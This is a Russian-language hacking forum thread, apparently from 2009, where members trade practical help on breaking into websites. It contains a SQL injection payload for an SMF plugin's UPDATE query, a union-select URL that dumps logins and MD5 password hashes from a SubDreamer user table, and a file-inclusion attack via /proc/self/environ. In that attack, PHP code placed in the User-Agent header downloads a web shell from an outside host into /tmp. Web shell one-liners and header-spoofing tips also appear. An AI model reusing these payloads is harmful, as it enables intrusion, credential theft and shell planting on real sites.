Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Flair

    Flair Member

    Joined:
    7 May 2009
    Messages:
    36
    Likes Received:
    13
    Reputations:
    9
    а как узнать как он проверяется?
     
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Взглянуть в сорсы :)
     
    1 person likes this.
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Так не бывает.
    Давай сюда
    1. Что прописано в логах (через что ты выполняешь комманды. КОД)
    2. phpinfo() директивы
    allow_url_fopen
    allow_url_include
    magic_quotes_gpc
    safe_mode
    disable_functions
    3. ls -lia (ты-же как-то качалки искал, значит возможно)
    4. Как ты пытаешься залить через copy (полностью)
     
  4. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Или методом тыка :) Попробуй подменить x_forwarder_for, хотя сейчас уже мало где проверяют так, но всё же... :)
     
    1 person likes this.
  5. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    В статье электа написано про то, что если в значение сессион ид вставить спецсимволы,то будет ошибка и раскрытие путей. Как защитится от этого? Спрашивал очень многих, никто ничего сказать не смог.
     
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Фильтруй регулярками.
     
  7. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    @session_start();
     
    2 people like this.
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Вопрос:

    Уязвимость возникает из-за ошибки в проверке входных данных в функции "imagerotate()". Атакующий может прочитать произвольные участки памяти.

    Как же это замутить ))
     
  9. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Уязвимости php 5.2 ?? :)

    http://www.xakep.ru/vulnerability/PHP/
     
  10. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://milw0rm.com/exploits/7646
     
  11. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Code:
    function affiliates_banners_edit_verify()
    {
    	global $txt, $smcFunc, $sourcedir, $board_info, $board, $selected_boards;
    	
    	// Check Permission for Admin and Affiliates Manager
    	if (!allowedTo('affiliates_manage'))
    		fatal_lang_error('affiliates_no_permission', false);	
    
    	// We need an ID!!	  
    	if (empty($_REQUEST['id']))
    		fatal_lang_error('banners_no_selected', false);	
    		
    	// Check the banner
    	$bannerimage = htmlspecialchars($_REQUEST['bannerimage'], ENT_QUOTES);
            $banner_id = $_REQUEST['id'];
    	
            if (empty($bannerimage))
    		fatal_lang_error('banner_no_image',false);    
    	
    	$smcFunc['db_query']('', "
    	UPDATE {db_prefix}affiliates_banners
    	SET image = '$bannerimage'
    	WHERE id_banner = $banner_id LIMIT 1");
    				
    	// Please redirectme to the new banner
    	redirectexit('action=affiliates;sa=banners');
    }
    
    people,тут же есть вроде инъект,и как мне его с UPDATE реализовать?

    P.S. просто уже мозг кипит
     
    _________________________
    #8231 HAXTA4OK, 29 Jul 2009
    Last edited: 29 Jul 2009
  12. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    script.php?bannerimage=asd&id=1 and 1=(if(1=1,1,(select 1 union select 2)))
    мож так, не проверял да и от многих факторов зависит
     
  13. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    jokester
    1) Выполнял запросы через /proc/self/environ. PHP код писал в User-Agent.
    2) allow_url_fopen = 1
    allow_url_include = в phpinfo его вообще нету
    magic_quotes_gpc = 1
    safe mode = 0
    disable_functions = no value
    3) ls -la пашет, проверил /tmp - все норм.
    4) <? copy('http://evilcod3.narod.ru/configs.php','/tmp/qqq.txt'); ?>
    когла понял, что стоит мк, пробывал так:
    <?php copy(base64_decode(blabla)); ?>
    -----------------------------------------------------------

    Мне Grey уже помог с шеллом, но нихуя не объяснил. Он залил как-то вручную через пакету, но не суть...

    jokester, был бы рад услышать твой совет... )

    P.S.
    Я знаю, что в чем-то не прав =\
     
  14. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    в User-Agent пропиши
    <? copy('http://evilcod3.narod.ru/configs.php','/tmp/qqq.txt'); ?>
    magic_quotes_gpc действует только на gpc те. на _REQUEST а на User-Agent не распространяется
     
    1 person likes this.
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Tigger

    Если allow_url_include в phpinfo нет, то версия пыха, как я понимаю четвёртая. Тут будет работать и инклуд удалённый скорее всего, ну а copy() уж 100%.

    Проблема только в кавычках. А вариантов масса. Я-же не зря спрашивал какой код ты пишешь. Именно КОД.
    Одно дело если это например <? system($_GET[cmd]); ?> совсем другое если <?php eval($_REQUEST[ev]); ?> или например <?php include($_REQUEST[c]); ?> Туда ведь можно записать много чего, подумай, я думаю запросто найдёшь ещё парочку. :)

    Я просто предполагаю, что Грей не просто так не объяснил, он любит по этой тематике задачки давать, поэтому фишек палить не буду, хотя они все в паблике, найдёшь без проблем
     
    1 person likes this.
  16. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    такое дело :

    вывожу записи лимитом,движок сайта сабдример.
    Code:
    http://сайт.ру/catalog/index.php?category=-2+union+select+1,concat(0x3a,login,pass),3,4,5,6,7+from+pmd_users+limit+1,0--
    вылазит такое :
    login1821165f4dcc3b5aa765d61d8327deb882cf99

    меняется при изминении значения лимита только эта часть:

    login1821165f4dcc3b5aa765d61d8327deb882cf99

    вобщем что посоветуете?
     
  17. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    после зелёного идёт MD5
     
  18. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    это понятно что мд5,но эта часть во всех записях не меняется .
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    L I G A

    Меняется окончание логина? Где разделитель-то?

    или concat_ws(0x3a,login,pass) или concat(login,0x3a,pass), ты уж определись
     
  20. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    concat_ws(0x3a,login,pass)
    login363307:5f4dcc3b5aa765d61d8327deb882cf99
    меняется:
    login363307:5f4dcc3b5aa765d61d8327deb882cf99
     
    #8240 L I G A, 29 Jul 2009
    Last edited: 29 Jul 2009
Thread Status:
Not open for further replies.